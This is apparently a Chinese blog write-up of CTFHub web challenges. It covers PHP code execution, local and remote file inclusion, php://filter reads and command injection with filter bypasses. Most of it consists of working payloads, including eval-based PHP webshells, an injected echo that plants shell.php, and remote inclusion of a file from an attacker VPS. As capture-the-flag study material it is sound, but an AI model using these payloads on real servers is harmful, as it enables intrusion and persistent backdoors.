<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323021420270.png" alt="image-20220323021420270"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=system(&#x27;cat ../../../flag_8890&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323021516030.png" alt="image-20220323021516030"></p>
<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_REQUEST[&#x27;ctfhub&#x27;]);?&gt;</span><br></pre></td></tr></table></figure>

<p>有个shell.txt,访问发现有个参数ctfhub，于是利用文件包含，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=shell.txt&amp;ctfhub=system(&#x27;ls&#x27;);</span><br></pre></td></tr></table></figure>

<p>查目录，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=shell.txt&amp;ctfhub=system(&#x27;cat ../../../flag&#x27;);</span><br></pre></td></tr></table></figure>

<h2 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h2><p>php:&#x2F;&#x2F;input 是个可以访问请求的原始数据的只读流.可以接收post请求作为输入流的输入，将请求作为PHP代码的输入传递给目标变量，以达到以post 的形式进行输入的目的。</p>
<p>查看phpinfo，发现这两是打开的，说明方法可行</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323022902971.png" alt="image-20220323022902971"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323022800329.png" alt="image-20220323022800329"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323022944285.png" alt="image-20220323022944285"></p>
<h2 id="读取源代码"><a href="#读取源代码" class="headerlink" title="读取源代码"></a>读取源代码</h2><p>这道题遇到过很多次同种类型了，用伪协议读取直接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.base64-encode/resource=/flag</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323023639259.png" alt="image-20220323023639259"></p>
<p>再进行一个base64解码即可得到flag</p>
<h2 id="远程包含"><a href="#远程包含" class="headerlink" title="远程包含"></a>远程包含</h2><p>在vps上创建一个文件写好系统命令，进行远程包含</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=http://xxx.xx.xx.xx/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323024358532.png" alt="image-20220323024358532"></p>
<p>得到flag</p>
<h2 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h2><p>看到有个php，于是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp; cat 88281526027669.php</span><br></pre></td></tr></table></figure>

<p>ping后无回显，于是base64转码一下，成功得到回显<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323024907882.png" alt="image-20220323024907882"></p>
<p>不过我还看到一个操作，也是可行的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp;echo &quot;&lt;?php @eval(\$_POST[&#x27;a&#x27;]);?&gt;&quot; &gt;&gt; shell.php</span><br></pre></td></tr></table></figure>

<p>直接写个马进去</p>
<p>蚁剑成功连接上<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323025634684.png" alt="image-20220323025634684"></p>
<p>这里可以看见，flag是被注释掉了，难怪第一种方法没有回显</p>
<h2 id="过滤cat"><a href="#过滤cat" class="headerlink" title="过滤cat"></a>过滤cat</h2><p>过滤cat关我tac什么事</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp; tac flag_104451206227791.php|base64</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323030114451.png" alt="image-20220323030114451">写马的方式也一样能用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp;echo &quot;&lt;?php @eval(\$_POST[&#x27;a&#x27;]);?&gt;&quot; &gt;&gt; shell.php</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323030316086.png" alt="image-20220323030316086"></p>
<h2 id="过滤空格-1"><a href="#过滤空格-1" class="headerlink" title="过滤空格"></a>过滤空格</h2><p>能代替空格的可就太多了，这里我们用的是${IFS}</p>
<p><code>?ip=127.0.0.1$&#123;IFS&#125;%26$&#123;IFS&#125;ls#</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323030703618.png" alt="image-20220323030703618"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1$&#123;IFS&#125;&amp;$&#123;IFS&#125;cat$&#123;IFS&#125;flag_22372299923305.php|base64</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220323031022662.png" alt="image-20220323031022662"></p>
<h2 id="过滤目录分隔符"><a href="#过滤目录分隔符" class="headerlink" title="过滤目录分隔符"></a>过滤目录分隔符</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp; cd flag_is_here;ls;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp; cd flag_is_here;cat flag_20743402023207.php|base64</span><br></pre></td></tr></table></figure>

<p>但是思来想去，这些过滤都没有防范我写马进去，甚至payload都不用变</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp;echo &quot;&lt;?php @eval(\$_POST[&#x27;a&#x27;]);?&gt;&quot; &gt;&gt; shell.php</span><br></pre></td></tr></table></figure>

<h2 id="过滤运算符"><a href="#过滤运算符" class="headerlink" title="过滤运算符"></a>过滤运算符</h2><p>&amp;被过滤，用;代替</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;ls</span><br></pre></td></tr></table></figure>
<p>127.0.0.1;cat flag_35923221712564.php|base64   &#x3D;   127.0.0.1;base64 flag_35923221712564.php </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;base64 flag_7518163641606.php</span><br></pre></td></tr></table></figure>

<p>一样的可以写马</p>
<h2 id="综合过滤练习"><a href="#综合过滤练习" class="headerlink" title="综合过滤练习"></a>综合过滤练习</h2><p>就是一个疯狂加过滤的题，考虑使用编码绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1%0als</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1%0acd$&#123;IFS&#125;f???_is_here%0als</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1%0acd$&#123;IFS&#125;f???_is_here%0abase64$&#123;IFS&#125;f???_8886214875044.php%0a</span><br></pre></td></tr></table></figure></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2022-09-27</span><i class="fa fa-tag"></i><a class="tag" href="/tags/CTF/" title="CTF">CTF </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://example.com/2022/09/27/CTFHUB刷题记录/,2js56's blog,CTFHUB刷题记录,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2022/09/27/%5BCISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1%5DHack%20World/" title="[CISCN2019 华北赛区 Day2 Web1]Hack World复现">Post anterior</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2022/09/14/sql%E6%B3%A8%E5%85%A5%E8%BF%9B%E9%98%B6/" title="sql注入进阶">Post siguiente</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>